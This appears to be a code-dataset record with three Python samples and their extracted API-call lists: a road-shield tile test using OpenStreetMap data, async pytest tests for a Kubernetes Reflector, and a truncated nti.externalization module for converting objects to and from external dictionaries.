dsl.is_in('AU', z, x, y),
# https://www.openstreetmap.org/way/286361145
dsl.way(286361145, dsl.tile_diagonal(z, x, y), {
'highway': u'trunk',
'lanes': u'4',
'lit': u'yes',
'maxspeed': u'50',
'name': u'<NAME>',
'parking:lane:both:parallel': u'on_street',
'parking:lane:both:width': u'2',
'ref': u'A36',
'ref:start_date': u'2013-06',
'sidewalk': u'both',
'smoothness:lanes': u'|||intermediate',
'source': u'openstreetmap.org',
'surface': u'paved',
'width': u'13.7',
}),
dsl.relation(1, {
'addr:country': u'AU',
'addr:state': u'NSW',
'ref': u'A36',
'ref:start_date': u'2013-06',
'route': u'road',
'source': u'openstreetmap.org',
'type': u'route',
}, ways=[286361145]),
)
self.assert_has_feature(
z, x, y, 'roads', {
'id': 286361145,
'shield_text': 'A36',
'network': 'AU:A-road',
})
| [
"dsl.tile_diagonal",
"dsl.is_in",
"dsl.relation"
] | [((231, 255), 'dsl.is_in', 'dsl.is_in', (['"""AU"""', 'z', 'x', 'y'], {}), "('AU', z, x, y)\n", (240, 255), False, 'import dsl\n'), ((924, 1094), 'dsl.relation', 'dsl.relation', (['(1)', "{'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'M1', 'route':\n u'road', 'source': u'openstreetmap.org', 'type': u'route'}"], {'ways': '[170318728]'}), "(1, {'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'M1',\n 'route': u'road', 'source': u'openstreetmap.org', 'type': u'route'},\n ways=[170318728])\n", (936, 1094), False, 'import dsl\n'), ((1525, 1549), 'dsl.is_in', 'dsl.is_in', (['"""AU"""', 'z', 'x', 'y'], {}), "('AU', z, x, y)\n", (1534, 1549), False, 'import dsl\n'), ((2265, 2466), 'dsl.relation', 'dsl.relation', (['(1)', "{'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'A36',\n 'ref:start_date': u'2013-06', 'route': u'road', 'source':\n u'openstreetmap.org', 'type': u'route'}"], {'ways': '[286361145]'}), "(1, {'addr:country': u'AU', 'addr:state': u'NSW', 'ref': u'A36',\n 'ref:start_date': u'2013-06', 'route': u'road', 'source':\n u'openstreetmap.org', 'type': u'route'}, ways=[286361145])\n", (2277, 2466), False, 'import dsl\n'), ((346, 372), 'dsl.tile_diagonal', 'dsl.tile_diagonal', (['z', 'x', 'y'], {}), '(z, x, y)\n', (363, 372), False, 'import dsl\n'), ((1640, 1666), 'dsl.tile_diagonal', 'dsl.tile_diagonal', (['z', 'x', 'y'], {}), '(z, x, y)\n', (1657, 1666), False, 'import dsl\n')] |
from kubernetes_informers import Reflector, CoalescingQueue
from kubernetes_informers.reflector import Delta
import asyncio
import pytest
from kubernetes_asyncio import client
def make_pod(ns, name, rv):
return client.V1Pod(
metadata=client.V1ObjectMeta(namespace=ns, resource_version=rv, name=name),
)
@pytest.mark.asyncio
async def test_single_changes():
"""
Validate deltas with single object changes only
"""
states = [
# Initial state is empty
[],
# Add pod1
[make_pod('ns', 'pod1', 1) ],
# Add pod2
[
make_pod('ns', 'pod1', 1),
make_pod('ns', 'pod2', 1)
],
# Change pod1
[
make_pod('ns', 'pod1', 2),
make_pod('ns', 'pod2', 1)
],
# Delete pod1
[
make_pod('ns', 'pod2', 1)
],
# Change pod2
[
make_pod('ns', 'pod2', 2)
],
# Delete pod2
[],
]
deltas = [
Delta(type='added', resource=make_pod('ns', 'pod1', 1)),
Delta(type='added', resource=make_pod('ns', 'pod2', 1)),
Delta(type='changed', resource=make_pod('ns', 'pod1', 2)),
Delta(type='deleted', resource=make_pod('ns', 'pod1', 2)),
Delta(type='changed', resource=make_pod('ns', 'pod2', 2)),
Delta(type='deleted', resource=make_pod('ns', 'pod2', 2)),
]
yield_states = iter(states)
async def fake_list_method(namespace, *args, **kwargs):
assert namespace == 'ns'
state = next(yield_states)
return client.V1PodList(items=state)
q = CoalescingQueue()
r = Reflector(q, fake_list_method, 'ns', resync_period=0.1)
reflect_future = asyncio.ensure_future(r.reflect())
for expected_delta in deltas:
delta = await q.get()
assert delta == expected_delta
reflect_future.cancel()
@pytest.mark.asyncio
async def test_multiple_changes():
"""
Validate deltas with single object changes only
"""
states = [
# Initial state is empty
[],
# Add two pods
[
make_pod('ns', 'pod1', 1),
make_pod('ns', 'pod2', 1)
],
# Change pod1
[
make_pod('ns', 'pod1', 2),
make_pod('ns', 'pod2', 1)
],
# Delete pod1
[
make_pod('ns', 'pod2', 1)
],
# Change pod2
[
make_pod('ns', 'pod2', 2)
],
# Add pod3 and pod4
[
make_pod('ns', 'pod2', 2),
make_pod('ns', 'pod3', 1),
make_pod('ns', 'pod4', 1),
],
# Change pod3 and pod4
[
make_pod('ns', 'pod2', 2),
make_pod('ns', 'pod3', 2),
make_pod('ns', 'pod4', 2),
],
# Delete all pods
[],
]
delta_batches = [
[
Delta(type='added', resource=make_pod('ns', 'pod1', 1)),
Delta(type='added', resource=make_pod('ns', 'pod2', 1)),
],
[
Delta(type='changed', resource=make_pod('ns', 'pod1', 2)),
],
[
Delta(type='deleted', resource=make_pod('ns', 'pod1', 2)),
],
[
Delta(type='changed', resource=make_pod('ns', 'pod2', 2)),
],
[
Delta(type='added', resource=make_pod('ns', 'pod3', 1)),
Delta(type='added', resource=make_pod('ns', 'pod4', 1)),
],
[
Delta(type='changed', resource=make_pod('ns', 'pod3', 2)),
Delta(type='changed', resource=make_pod('ns', 'pod4', 2)),
],
[
Delta(type='deleted', resource=make_pod('ns', 'pod2', 2)),
Delta(type='deleted', resource=make_pod('ns', 'pod3', 2)),
Delta(type='deleted', resource=make_pod('ns', 'pod4', 2)),
]
]
yield_states = iter(states)
async def fake_list_method(namespace, *args, **kwargs):
assert namespace == 'ns'
state = next(yield_states)
return client.V1PodList(items=state)
q = CoalescingQueue()
r = Reflector(q, fake_list_method, 'ns', resync_period=0.1)
reflect_future = asyncio.ensure_future(r.reflect())
for delta_batch in delta_batches:
while len(delta_batch) != 0:
delta = await q.get()
assert delta in delta_batch
delta_batch.remove(delta)
reflect_future.cancel()
| [
"kubernetes_informers.Reflector",
"kubernetes_informers.CoalescingQueue",
"kubernetes_asyncio.client.V1ObjectMeta",
"kubernetes_asyncio.client.V1PodList"
] | [((1635, 1652), 'kubernetes_informers.CoalescingQueue', 'CoalescingQueue', ([], {}), '()\n', (1650, 1652), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((1661, 1716), 'kubernetes_informers.Reflector', 'Reflector', (['q', 'fake_list_method', '"""ns"""'], {'resync_period': '(0.1)'}), "(q, fake_list_method, 'ns', resync_period=0.1)\n", (1670, 1716), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((4110, 4127), 'kubernetes_informers.CoalescingQueue', 'CoalescingQueue', ([], {}), '()\n', (4125, 4127), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((4136, 4191), 'kubernetes_informers.Reflector', 'Reflector', (['q', 'fake_list_method', '"""ns"""'], {'resync_period': '(0.1)'}), "(q, fake_list_method, 'ns', resync_period=0.1)\n", (4145, 4191), False, 'from kubernetes_informers import Reflector, CoalescingQueue\n'), ((1596, 1625), 'kubernetes_asyncio.client.V1PodList', 'client.V1PodList', ([], {'items': 'state'}), '(items=state)\n', (1612, 1625), False, 'from kubernetes_asyncio import client\n'), ((4071, 4100), 'kubernetes_asyncio.client.V1PodList', 'client.V1PodList', ([], {'items': 'state'}), '(items=state)\n', (4087, 4100), False, 'from kubernetes_asyncio import client\n'), ((247, 312), 'kubernetes_asyncio.client.V1ObjectMeta', 'client.V1ObjectMeta', ([], {'namespace': 'ns', 'resource_version': 'rv', 'name': 'name'}), '(namespace=ns, resource_version=rv, name=name)\n', (266, 312), False, 'from kubernetes_asyncio import client\n')] |
# cython: auto_pickle=False,embedsignature=True,always_allow_keywords=False
# -*- coding: utf-8 -*
"""
Datastructures to help externalization.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# There are a *lot* of fixme (XXX and the like) in this file.
# Turn those off in general so we can see through the noise.
# pylint:disable=fixme
# pylint:disable=keyword-arg-before-vararg
# stdlib imports
import numbers
import warnings
import six
from six import iteritems
from zope import interface
from zope import schema
from zope.component import getUtility
from zope.schema.interfaces import SchemaNotProvided
from zope.schema.interfaces import IDict
from zope.schema.interfaces import IObject
from nti.schema.interfaces import find_most_derived_interface
from .interfaces import IInternalObjectExternalizer
from .interfaces import IInternalObjectIO
from .interfaces import IInternalObjectIOFinder
from .interfaces import IAnonymousObjectFactory
from .interfaces import StandardInternalFields
# Things imported from cython with matching cimport
from .externalization.dictionary import to_minimal_standard_external_dictionary
from .externalization.dictionary import internal_to_standard_external_dictionary
# Must rename this so it doesn't conflict with method defs;
# that breaks cython
from .externalization.externalizer import to_external_object as _toExternalObject
from .internalization import validate_named_field_value
from .internalization.factories import find_factory_for
from .representation import make_repr
from .factory import AnonymousObjectFactory
from ._base_interfaces import get_standard_external_fields
from ._base_interfaces import get_standard_internal_fields
from ._base_interfaces import get_default_externalization_policy
from ._base_interfaces import NotGiven
from ._interface_cache import cache_for
StandardExternalFields = get_standard_external_fields()
StandardInternalFields = get_standard_internal_fields()
DEFAULT_EXTERNALIZATION_POLICY = get_default_externalization_policy()
IDict_providedBy = IDict.providedBy
IObject_providedBy = IObject.providedBy
__all__ = [
'ExternalizableDictionaryMixin',
'StandardInternalObjectExternalizer',
'AbstractDynamicObjectIO',
'ExternalizableInstanceDict',
'InterfaceObjectIO',
'ModuleScopedInterfaceObjectIO',
]
class ExternalizableDictionaryMixin(object):
"""
Implements a toExternalDictionary method as a base for subclasses.
"""
#: If true, then when asked for the standard dictionary, we will instead
#: produce the *minimal* dictionary. See :func:`~to_minimal_standard_external_dictionary`
__external_use_minimal_base__ = False
def _ext_replacement(self):
"""
Return the object that we are externalizing.
This class returns ``self``, but subclasses will typically override this.
"""
return self
def _ext_standard_external_dictionary(self, replacement, mergeFrom=None, **kwargs):
if self.__external_use_minimal_base__:
return to_minimal_standard_external_dictionary(replacement,
mergeFrom=mergeFrom)
return internal_to_standard_external_dictionary(
replacement,
mergeFrom=mergeFrom,
decorate=kwargs.get('decorate', True),
request=kwargs.get('request', NotGiven),
decorate_callback=kwargs.get('decorate_callback', NotGiven),
policy=kwargs.get("policy", DEFAULT_EXTERNALIZATION_POLICY),
)
def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
"""
Produce the standard external dictionary for this object.
Uses `_ext_replacement`.
"""
return self._ext_standard_external_dictionary(self._ext_replacement(),
mergeFrom=mergeFrom,
**kwargs)
class StandardInternalObjectExternalizer(ExternalizableDictionaryMixin):
"""
An *adapter* that can be used to implement
:class:`~nti.externalization.interfaces.IInternalObjectExternalizer`.
The result of externalizing is the standard external dictionary
for this adapter's *context* argument.
This can be registered as-is, or subclassed to add additional
items in the external dictionary. In that case, always begin by
calling this implemention first and updating the result.
.. versionadded:: 2.3.0
"""
def __init__(self, context):
"""
The constructor sets ``__external_can_create__`` to `False` (because
creating from just an externalizer makes no sense) and
``__external_class_name__`` to `None` (if you override this value,
it will replace the ``Class`` value in the returned dictionary;
it *must* be a native `str`).
"""
self.context = context
self.__external_can_create__ = False
self.__external_class_name__ = None
def _ext_replacement(self):
"""
Returns this adapter's *context* argument.
"""
return self.context
def toExternalObject(self, **kwargs):
result = self.toExternalDictionary(**kwargs)
if self.__external_class_name__:
result[StandardExternalFields.CLASS] = self.__external_class_name__
return result
interface.classImplements(StandardInternalObjectExternalizer,
IInternalObjectExternalizer)
class AbstractDynamicObjectIO(ExternalizableDictionaryMixin):
"""
Base class for objects that externalize based on dynamic information.
Abstractions are in place to allow subclasses to map external and internal names
independently (this type never uses getattr/setattr/hasattr, except for some
standard fields).
See `InterfaceObjectIO` for a complete implementation.
"""
# TODO: there should be some better way to customize this if desired (an explicit list)
# TODO: Play well with __slots__
# TODO: This won't evolve well. Need something more sophisticated,
# probably a meta class.
# Avoid things super handles
# These all *should* be frozenset() and immutable
_excluded_out_ivars_ = frozenset({
StandardInternalFields.ID,
StandardExternalFields.ID,
StandardInternalFields.CREATOR,
StandardExternalFields.CREATOR,
StandardInternalFields.CONTAINER_ID,
'lastModified',
StandardInternalFields.LAST_MODIFIEDU,
StandardInternalFields.CREATED_TIME,
'links'
})
_excluded_in_ivars_ = frozenset({
StandardInternalFields.ID,
StandardExternalFields.ID,
StandardExternalFields.OID,
StandardInternalFields.CREATOR,
StandardExternalFields.CREATOR,
StandardInternalFields.LAST_MODIFIED,
StandardInternalFields.LAST_MODIFIEDU,
# Also the IDCTimes created/modified values
'created', 'modified',
StandardExternalFields.CLASS,
StandardInternalFields.CONTAINER_ID
})
_ext_primitive_out_ivars_ = frozenset()
_prefer_oid_ = False
def find_factory_for_named_value(self, key, value): # pylint:disable=unused-argument
"""
Uses `.find_factory_for` to locate a factory.
This does not take into account the current object (context)
or the *key*. It only handles finding factories based on the
class or MIME type found within *value*.
"""
return find_factory_for(value)
def _ext_replacement(self):
# Redeclare this here for cython
return self
def _ext_all_possible_keys(self):
"""
This method must return a `frozenset` of native strings.
"""
raise NotImplementedError()
def _ext_setattr(self, ext_self, k, value):
raise NotImplementedError()
def _ext_getattr(self, ext_self, k, default=NotGiven):
"""
_ext_getattr(object, name[, default]) -> value
Return the attribute of the *ext_self* object with the internal name *name*.
If the attribute does not exist, should raise (typically :exc:`AttributeError`),
unless *default* is given, in which case it returns that.
.. versionchanged:: 1.0a4
Add the *default* argument.
"""
raise NotImplementedError()
def _ext_replacement_getattr(self, name, default=NotGiven):
"""
Like `_ext_getattr`, but automatically fills in `_ext_replacement`
for the *ext_self* argument.
.. versionadded:: 1.0a4
"""
return self._ext_getattr(self._ext_replacement(), name, default)
def _ext_keys(self):
"""
Return only the names of attributes that should be externalized.
These values will be used as keys in the external dictionary.
See :meth:`_ext_all_possible_keys`. This implementation then filters out
*private* attributes (those beginning with an underscore),
and those listed in ``_excluded_in_ivars_``.
This method must return a set of native strings.
"""
# Sadly, we cannot yet enforce what type _excluded_out_ivars_ is.
# Mostly it is a set or frozen set (depending on how it was
# combined with the declaration in this class) but some overrides
# in the wild have it as a tuple. We need a metaclass to fix that.
excluded = self._excluded_out_ivars_
return [k for k in self._ext_all_possible_keys()
if (k not in excluded # specifically excluded
and not k.startswith('_'))] # private
# and not callable(getattr(ext_self,k)))] # avoid functions
def _ext_primitive_keys(self):
"""
Return a container of string keys whose values are known to be primitive.
This is an optimization for writing.
This method must return a frozenset.
"""
return self._ext_primitive_out_ivars_
def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
result = super(AbstractDynamicObjectIO, self).toExternalDictionary(mergeFrom=mergeFrom,
**kwargs)
ext_self = self._ext_replacement()
primitive_ext_keys = self._ext_primitive_keys()
for k in self._ext_keys():
if k in result:
# Standard key already added
continue
ext_val = attr_val = self._ext_getattr(ext_self, k)
__traceback_info__ = k, attr_val
if k not in primitive_ext_keys:
ext_val = _toExternalObject(attr_val, **kwargs)
result[k] = ext_val
if ext_val is not attr_val:
# We want to be sure things we externalize have the
# right parent relationship but if we are directly
# externalizing an existing object (e.g., primitive or
# something that uses a replacement) we don't want to
# change the relationship or even set one in the first
# place---if the object gets pickled later on, that
# could really screw things up (One symptom is
# InvalidObjectReference from ZODB across
# transactions/tests) if ILocation.providedBy(
# result[k] ): (throwing is faster than providedBy)
try:
ext_val.__parent__ = ext_self
except AttributeError:
# toExternalObject is schizophrenic about when it converts
# return values to LocatedExternalDict/List. Sometimes it
# does, sometimes it does not.
pass
if (StandardExternalFields.ID in result
and StandardExternalFields.OID in result
and self._prefer_oid_
and result[StandardExternalFields.ID] != result[StandardExternalFields.OID]):
result[StandardExternalFields.ID] = result[StandardExternalFields.OID]
return result
def toExternalObject(self, mergeFrom=None, *args, **kwargs):
return self.toExternalDictionary(mergeFrom, *args, **kwargs)
def _ext_accept_update_key(self, k, ext_self, ext_keys): # pylint:disable=unused-argument
"""
Returns whether or not this key should be accepted for setting
on the object, or silently ignored.
:param ext_keys: As an optimization, the value of :meth:`_ext_all_possible_keys`
is passed. Keys are only accepted if they are in this list.
"""
return k not in self._excluded_in_ivars_ and k in ext_keys
def _ext_accept_external_id(self, ext_self, parsed): # pylint:disable=unused-argument
"""
If the object we're updating does not have an ``id`` set, but there is an
``ID`` in the external object, should we be able to use it?
:return: boolean
"""
return False # false by default
def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
return self._updateFromExternalObject(parsed)
def _updateFromExternalObject(self, parsed):
updated = False
ext_self = self._ext_replacement()
ext_keys = self._ext_all_possible_keys()
for k, v in iteritems(parsed):
if not self._ext_accept_update_key(k, ext_self, ext_keys):
continue
__traceback_info__ = (k, v)
self._ext_setattr(ext_self, k, v)
updated = True
# TODO: Should these go through _ext_setattr?
if (StandardExternalFields.CONTAINER_ID in parsed
and getattr(ext_self, StandardInternalFields.CONTAINER_ID, parsed) is None):
setattr(ext_self,
StandardInternalFields.CONTAINER_ID,
parsed[StandardExternalFields.CONTAINER_ID])
if (StandardExternalFields.CREATOR in parsed
and getattr(ext_self, StandardInternalFields.CREATOR, parsed) is None):
setattr(ext_self,
StandardInternalFields.CREATOR,
parsed[StandardExternalFields.CREATOR])
if (StandardExternalFields.ID in parsed
and getattr(ext_self, StandardInternalFields.ID, parsed) is None
and self._ext_accept_external_id(ext_self, parsed)):
setattr(ext_self,
StandardInternalFields.ID,
parsed[StandardExternalFields.ID])
return updated
interface.classImplements(AbstractDynamicObjectIO, IInternalObjectIOFinder)
class _ExternalizableInstanceDict(AbstractDynamicObjectIO):
# TODO: there should be some better way to customize this if desired (an explicit list)
# TODO: Play well with __slots__? ZODB supports slots, but doesn't recommend them
# TODO: This won't evolve well. Need something more sophisticated,
# probably a meta class.
_update_accepts_type_attrs = False
def __init__(self, context):
self.context = context
for name in (
'_update_accepts_type_attrs',
'__external_use_minimal_base__',
'_excluded_in_ivars_',
'_excluded_out_ivars_',
'_ext_primitive_out_ivars_',
'_prefer_oid_'
):
try:
v = getattr(context, name)
except AttributeError:
continue
else:
setattr(self, name, v)
def _ext_replacement(self):
return self.context
def _ext_all_possible_keys(self):
# Be sure that this returns native strings, even if the dict
# has unicode (Python 2) or bytes (Python 3) values.
# Because we are likely to turn around and pass the strings
# we return here to _ext_getattr(), the best solution is to actually
# fix the dict if we find any broken attributes; Python 3 would fail
# if we encode a bytes value in the dict and then ask for it by string.
ext_self = self._ext_replacement()
ext_dict = ext_self.__dict__
# Do our best to avoid copying in the common case that no
# fixup is needed
for key in ext_dict:
if not isinstance(key, str):
# fixup
if hasattr(ext_self, '_p_changed'):
ext_self._p_changed = 1
for k in list(ext_dict):
if not isinstance(k, str):
new_k = k.encode('ascii') if not isinstance(k, bytes) else k.decode('ascii')
val = ext_dict.pop(k)
ext_dict[new_k] = val
break
return frozenset(ext_dict)
def _ext_getattr(self, ext_self, k, default=NotGiven):
if default is NotGiven:
return getattr(ext_self, k)
return getattr(ext_self, k, default)
def _ext_setattr(self, ext_self, k, value):
setattr(ext_self, k, value)
def _ext_accept_update_key(self, k, ext_self, ext_keys):
return (
super(_ExternalizableInstanceDict, self)._ext_accept_update_key(k, ext_self, ext_keys)
or (self._update_accepts_type_attrs and hasattr(ext_self, k))
)
class ExternalizableInstanceDict(object):
"""
Externalizes to a dictionary containing the members of
``__dict__`` that do not start with an underscore.
Meant to be used as a super class; also can be used as an external
object superclass.
Consider carefully before using this class. Generally, an interface
and `InterfaceObjectIO` are better.
.. versionchanged:: 1.0a5
No longer extends `AbstractDynamicObjectIO`, just delegates to it.
Most of the `_ext_`` prefixed methods can no longer be overridden.
"""
# This class is sometimes subclassed while also subclassing persistent.Persistent,
# which doesn't work if it's an extension class with an incompatible layout,
# as AbstractDynamicObjectIO is, so we can't subclass that. It's rarely used,
# so performance doesn't matter as much.
# pylint:disable=protected-access
_update_accepts_type_attrs = _ExternalizableInstanceDict._update_accepts_type_attrs
__external_use_minimal_base__ = _ExternalizableInstanceDict.__external_use_minimal_base__
_excluded_out_ivars_ = AbstractDynamicObjectIO._excluded_out_ivars_
_excluded_in_ivars_ = AbstractDynamicObjectIO._excluded_in_ivars_
_ext_primitive_out_ivars_ = AbstractDynamicObjectIO._ext_primitive_out_ivars_
_prefer_oid_ = AbstractDynamicObjectIO._prefer_oid_
def _ext_replacement(self):
"See `ExternalizableDictionaryMixin._ext_replacement`."
return self
def __make_io(self):
return _ExternalizableInstanceDict(self._ext_replacement())
def __getattr__(self, name):
# here if we didn't have the attribute. Does our IO?
return getattr(self.__make_io(), name)
def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
"See `~.IInternalObjectIO.updateFromExternalObject`"
self.__make_io().updateFromExternalObject(parsed)
def toExternalObject(self, mergeFrom=None, *args, **kwargs):
"See `~.IInternalObjectIO.toExternalObject`. Calls `toExternalDictionary`."
return self.toExternalDictionary(mergeFrom, *args, **kwargs)
def toExternalDictionary(self, mergeFrom=None, *unused_args, **kwargs):
"See `ExternalizableDictionaryMixin.toExternalDictionary`"
return self.__make_io().toExternalDictionary(mergeFrom, **kwargs)
__repr__ = make_repr()
interface.classImplements(ExternalizableInstanceDict, IInternalObjectIO)
_primitives = six.string_types + (numbers.Number, bool)
class _AnonymousDictFactory(AnonymousObjectFactory):
__external_factory_wants_arg__ = True
@staticmethod
def default_factory(value):
return value
class InterfaceObjectIO(AbstractDynamicObjectIO):
"""
Externalizes the *context* to a dictionary based on getting the
attributes of an object defined by an interface. If any attribute
has a true value for the tagged value ``_ext_excluded_out``, it
will not be considered for reading or writing.
This is an implementation of
`~nti.externalization.interfaces.IInternalObjectIOFinder`, meaning
it can both internalize (update existing objects) and externalize
(producing dictionaries), and that it gets to choose the factories
used for sub-objects when internalizing.
This class is meant to be used as an adapter, so it accepts the
object to externalize in the constructor, as well as the interface
to use to guide the process. The object is externalized using the
most-derived version of the interface given to the constructor
that it implements.
If the interface (or an ancestor) has a tagged value
``__external_class_name__``, it can either be the value to use for
the ``Class`` key, or a callable
``__external_class_name__(interface, object ) -> name.``
(TODO: In the future extend this to multiple, non-overlapping
interfaces, and better interface detection (see
:class:`ModuleScopedInterfaceObjectIO` for a limited version of
this.)
This class overrides `_ext_replacement` to return the *context*.
"""
_ext_iface_upper_bound = None
def __init__(self, context, iface_upper_bound=None, validate_after_update=True):
"""
:param iface_upper_bound: The upper bound on the schema to use
to externalize `ext_self`; we will use the most derived sub-interface
of this interface that the object implements. Subclasses can either override this
constructor to pass this parameter (while taking one argument themselves,
to be usable as an adapter), or they can define the class
attribute ``_ext_iface_upper_bound``
:param bool validate_after_update: If ``True`` (the default) then the entire
schema will be validated after an object has been updated with
:meth:`update_from_external_object`, not just the keys that were assigned.
"""
AbstractDynamicObjectIO.__init__(self)
self._ext_self = context
# Cache all of this data that we use. It's required often and, if not quite a bottleneck,
# does show up in the profiling data
cache = cache_for(self, context)
if cache.iface is None:
cache.iface = self._ext_find_schema(
context,
iface_upper_bound if iface_upper_bound is not None else self._ext_iface_upper_bound
)
self._iface = cache.iface
if not cache.ext_primitive_out_ivars:
keys = self._ext_find_primitive_keys()
primitives = self._ext_primitive_out_ivars_
if not isinstance(primitives, frozenset):
warnings.warn(
"Class %r should have a frozenset for _ext_primitive_out_ivars_."
"Make InterfaceObjectIO._ext_primitive_out_ivars_ the LHS of the | operator."
"This will be a TypeError in the future" % (
type(self)
),
FutureWarning,
)
primitives = frozenset(primitives)
cache.ext_primitive_out_ivars = primitives | keys
self._ext_primitive_out_ivars_ = cache.ext_primitive_out_ivars
self.validate_after_update = validate_after_update
def __repr__(self):
return '<%s.%s for %r at 0x%x>' % (
type(self).__module__, type(self).__name__,
self.schema,
id(self)
)
@property
def schema(self):
"""
The schema we will use to guide the process
"""
return self._iface
def _ext_find_schema(self, ext_self, iface_upper_bound):
return find_most_derived_interface(ext_self,
iface_upper_bound,
possibilities=self._ext_schemas_to_consider(ext_self))
def _ext_find_primitive_keys(self):
result = set()
for n in self._ext_all_possible_keys():
field = self._iface[n]
field_type = getattr(field, '_type', None)
if field_type is not None:
if isinstance(field_type, tuple):
# Cython doesn't like a generator here
# ("local variable 'field_type' referenced before assignment")
# pylint:disable=use-a-generator
if all([issubclass(x, _primitives) for x in field_type]):
result.add(n)
elif issubclass(field_type, _primitives):
result.add(n)
return frozenset(result)
def _ext_schemas_to_consider(self, ext_self):
return interface.providedBy(ext_self)
def _ext_replacement(self):
return self._ext_self
def _ext_all_possible_keys(self):
cache = cache_for(self, self._ext_self)
if cache.ext_all_possible_keys is None:
iface = self._iface
is_method = interface.interfaces.IMethod.providedBy
cache.ext_all_possible_keys = frozenset([
n for n in iface.names(all=True)
if (not is_method(iface[n]) # pylint:disable=no-value-for-parameter
and not iface[n].queryTaggedValue('_ext_excluded_out', False))
])
return cache.ext_all_possible_keys
def _ext_getattr(self, ext_self, k, default=NotGiven):
# TODO: Should this be directed through IField.get?
if default is NotGiven:
return getattr(ext_self, k)
return getattr(ext_self, k, default)
def _ext_setattr(self, ext_self, k, value):
validate_named_field_value(ext_self, self._iface, k, value)()
def _ext_accept_external_id(self, ext_self, parsed):
"""
If the interface we're working from has a tagged value
of ``__external_accept_id__`` on the ``id`` field, then
this will return that value; otherwise, returns false.
"""
cache = cache_for(self, ext_self)
if cache.ext_accept_external_id is None:
try:
field = cache.iface['id']
cache.ext_accept_external_id = field.getTaggedValue('__external_accept_id__')
except KeyError:
cache.ext_accept_external_id = False
return cache.ext_accept_external_id
def find_factory_for_named_value(self, key, value):
"""
If `AbstractDynamicObjectIO.find_factory_for_named_value`
cannot find a factory based on examining *value*, then we use
the context objects's schema to find a factory.
If the schema contains an attribute named *key*, it will be
queried for the tagged value ``__external_factory__``. If
present, this tagged value should be the name of a factory
object implementing `.IAnonymousObjectFactory` registered in
*registry* (typically registered in the global site).
The ZCML directive `.IAnonymousObjectFactoryDirective` sets up both the
registration and the tagged value.
This is useful for internalizing data from external sources
that does not provide a class or MIME field within the data.
The most obvious limitation of this is that if the *value* is part
of a sequence, it must be a homogeneous sequence. The factory is
called with no arguments, so the only way to deal with heterogeneous
sequences is to subclass this object and override this method to
examine the value itself.
A second limitation is that the external data key must match
the internal schema field name. Again, the only way to
remove this limitation is to subclass this object.
If no registered factory is found, and the schema field is
a `zope.schema.Dict` with a value type of `zope.schema.Object`,
then we return a factory which will update the object in place.
.. versionchanged:: 1.0a6
Only return an anonymous factory for ``IDict`` fields when
it wants objects for the value.
"""
factory = AbstractDynamicObjectIO.find_factory_for_named_value(self, key, value)
if factory is None: # pylint:disable=too-many-nested-blocks
# Is there a factory on the field?
# TODO: Simplify this.
try:
field = self._iface[key]
# See zcml.py:anonymousObjectFactoryDirective.
# This *should* be a string giving the dottedname of a factory utility.
# For test purposes we also allow it to be an actual object.
# TODO: If this becomes a bottleneck, the ZCML could
# have an argument global=False to allow setting the type
# directly instead of a string; the user would have to
# *know* that no sites would ever need a different value.
except KeyError:
pass
else:
factory = field.queryTaggedValue('__external_factory__')
# When it is a string, we require the factory to exist.
# Anything else is a programming error.
if isinstance(factory, str):
factory = getUtility(IAnonymousObjectFactory, factory)
if (
factory is None
and IDict_providedBy(field) # pylint:disable=no-value-for-parameter
and isinstance(value, dict)
and IObject_providedBy(field.value_type) # pylint:disable=no-value-for-parameter
):
# If is no factory found, check to see if the
# schema field is a Dict with a complex value type, and if
# so, automatically update it in place. The alternative
# requires the user to use a ZCML directive for each such
# dict field.
value_schema = field.value_type.schema
default_impl = value_schema.queryTaggedValue(
'__external_default_implementation__'
)
if default_impl is not None:
# Add MimeType if it's missing, so we can find the correct factories and
# updaters.
mime_type = default_impl.mimeType
for nested_value in value.values():
if (StandardExternalFields.MIMETYPE not in nested_value
and StandardExternalFields.CLASS not in nested_value):
nested_value[StandardExternalFields.MIMETYPE] = mime_type
factory = _AnonymousDictFactory(title=key,
interfaces=(value_schema,))
field.setTaggedValue('__external_factory__', factory)
return factory
def updateFromExternalObject(self, parsed, *unused_args, **unused_kwargs):
result = AbstractDynamicObjectIO._updateFromExternalObject(self, parsed)
# If we make it this far, then validate the object.
# TODO: Should probably just make sure that there are no /new/
# validation errors added Best we can do right now is skip
# this step if asked
# TODO: Swizzle this method at runtime to be in this object's
# dict, so we can elide the check.
if self.validate_after_update:
self._validate_after_update(self._iface, self._ext_self)
return result
def _validate_after_update(self, iface, ext_self):
errors = schema.getValidationErrors(iface, ext_self)
if errors:
__traceback_info__ = errors
try:
raise errors[0][1]
except SchemaNotProvided as e: # pragma: no cover
# XXX: We shouldn't be able to get here;
# ext_setattr should be doing this
# This can probably be removed
if not e.args: # zope.schema doesn't fill in the details, which sucks
e.args = (errors[0][0],)
raise
def toExternalObject(self, mergeFrom=None, **kwargs): # pylint:disable=arguments-differ
ext_class_name = None
# Walk up the tree, checking each one to see if ``__external__class_name__`` exists
# and wants to provide a value. The walking up is what ``queryTaggedValue`` would do,
# but we want to check each one in turn in case a subclass turns down but a superclass
# accepts.
for iface in self._iface.__iro__:
ext_class_name = iface.queryDirectTaggedValue('__external_class_name__')
if callable(ext_class_name):
# Even though the tagged value may have come from a superclass,
# give the actual class (interface) we're using
ext_class_name = ext_class_name(self._iface,
self._ext_replacement())
if ext_class_name:
break
if ext_class_name:
mergeFrom = mergeFrom if mergeFrom is not None else {}
mergeFrom[StandardExternalFields.CLASS] = ext_class_name
result = super(InterfaceObjectIO, self).toExternalObject(mergeFrom=mergeFrom, **kwargs)
return result
class ModuleScopedInterfaceObjectIO(InterfaceObjectIO):
"""
Only considers the interfaces provided within a given module
(usually declared as a class attribute) when searching for the
schema to use to externalize an object; the most derived version
of interfaces within that module will be used. Subclasses must
declare the class attribute ``_ext_search_module`` to be a module
(something with the ``__name__``) attribute to locate interfaces
in.
Suitable for use when all the externalizable fields of interest
are declared by an interface within a module, and an object does
